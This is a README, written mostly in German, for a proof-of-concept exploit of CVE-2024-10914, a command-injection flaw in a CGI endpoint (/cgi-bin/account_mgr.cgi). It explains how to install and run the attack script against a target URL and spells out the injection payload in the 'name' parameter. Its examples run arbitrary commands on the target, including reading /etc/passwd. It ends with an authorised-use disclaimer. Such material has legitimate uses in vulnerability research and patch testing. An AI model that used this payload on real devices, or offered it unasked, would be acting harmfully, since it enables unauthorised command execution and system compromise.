
PoC para explotar el CVE-2024-10914
Exploit für eine Command Injection-Schwachstelle im Endpunkt /cgi-bin/account_mgr.cgi. Diese Schwachstelle ermöglicht die Ausführung beliebiger Befehle auf dem betroffenen System über nicht bereinigte Parameter.
CVE-2024-10914 ist eine Command Injection-Schwachstelle, die Geräte mit einer CGI-Webschnittstelle betrifft. Die anfällige Anwendung validiert den Parameter name in der Anfrage cgi_user_add nicht ordnungsgemäß, sodass ein Angreifer Systembefehle einschleusen kann, die mit den Rechten der Anwendung ausgeführt werden.
Klonen Sie das Repository und installieren Sie die Abhängigkeiten:
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt
Oder installieren Sie manuell:
pip install requests
Das Skript akzeptiert zwei Argumente:
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMANDO>
-u, --url (erforderlich): URL des Ziels (Beispiel: http://192.168.1.1)-c, --command (optional): Auszuführender Befehl (Standard: id)Befehl id ausführen:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1
Benutzerdefinierten Befehl ausführen:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"
Dateien auflisten:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"
Der Exploit sendet eine GET-Anfrage an den verwundbaren Endpunkt mit folgendem Payload:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMANDO>; "
Die leere Zeichenkette wird mit Anführungszeichen geschlossen und der gewünschte Befehl eingeschleust, der im Kontext des Servers ausgeführt wird.
Das Skript zeigt Folgendes an:
Dieser Code wird ausschließlich zu Bildungs- und Sicherheitsforschungszwecken bereitgestellt. Er darf nur auf Systemen verwendet werden, für die Sie eine ausdrückliche Genehmigung haben. Die unbefugte Nutzung dieses Exploits kann gegen lokale Gesetze verstoßen und eine Straftat darstellen. Der Autor übernimmt keine Haftung für die missbräuchliche Verwendung dieses Werkzeugs.
SS3K
Nicht angegeben